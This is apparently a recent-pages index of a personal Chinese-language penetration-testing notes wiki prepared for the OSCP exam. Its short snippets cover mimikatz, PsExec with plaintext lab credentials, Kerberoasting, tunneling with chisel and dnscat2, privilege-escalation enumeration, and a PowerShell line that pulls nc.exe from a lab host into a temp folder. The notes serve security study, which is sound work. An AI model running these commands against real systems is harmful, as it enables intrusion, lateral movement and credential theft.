最近更新的頁面
【Windows】【弱掃】Seatbelt
Seatbelt 是一個 C# 項目,從進攻性和防禦性安全角度執行許多面向安全的主機調查「安全檢查」。 # 下載 wget https://github.com/r3motecontrol/...
【kali】未安裝工具
rockyou(seclists) /usr/share/seclists # 安裝 sudo apt update sudo apt install -y seclists cd...
【linux】【提權】【弱掃】linpeas
# install sudo apt-get update sudo apt-get -y install peass # 複製到本地 kali@kali:~$ cp /usr/sh...
【Windows】【列舉】常用命令
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...
【Tunnel】Port forwarding and Tunneling
Port forwarding socat : 課本18.2 範例 rinetd:它更適合長期的端口轉發配置,但對於臨時端口轉發解決方案來說可能稍微不夠靈活。 Netcat + 命名管道文...
【Tunneling】dnscat2
原生 dnscat2 https://teamssix.com/210608-150224.html https://github.com/iagox86/dnscat2 kali ...
【Tip】關於 bash
【Tip】無痕模式 bash script -c /bin/bash -q /dev/null 這個指令使用了 `script` 工具,該工具通常用於記錄終端會話。下面是詳細解釋: ...
【Tunneling】Chisel
# kali下載 wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd...
【轉載】Emotet病毒惡意文件分析實例
https://www.uuu.com.tw/Public/content/article/21/20210308.htm 主要是想寫 cyberchef 組合用法,有空再整理
Grafana alerting
https://www.cnblogs.com/liugp/p/17003484.html
【Windows】登入方法
密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashc...
【雜湊】【AD】mimikatz
PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...
【powershell】【橫移】PsExec
# 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
【反向 shell】
https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generato...
【SMB】【Remote】 CME ( CrackMapExec )
CrackMapExec(簡稱CME)是一個用於自動化測試和渗透測試的開源工具,旨在簡化與Windows環境中的Active Directory(AD)進行交互的過程。它是一個功能強大的渗透測試...
【powershell】PowerView
PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser ...
OSCP Exam Guide
https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide 截圖規範: log ip user 考...
常用連結
google haking databasehttps://dorksearch.com/ 發現運行在特定網站上的技術,以及查找與相同IP網段共享的其他主機。https://searchdns...
【密碼】【字典】crunch
字典生成 # 最小和最大長度設置為 6 個字符 # 使用 -t 參數指定模式,然後將前三個字符硬編碼為 "Lab",後跟三位數字。 kali@kali:~$ crunch 6 6 -t L...
【列舉】【shell】getcap
https://feichashao.com/capabilities_basic/ # 尋找設置uid檔案 joe@debian-privesc:~$ /usr/sbin/getcap -...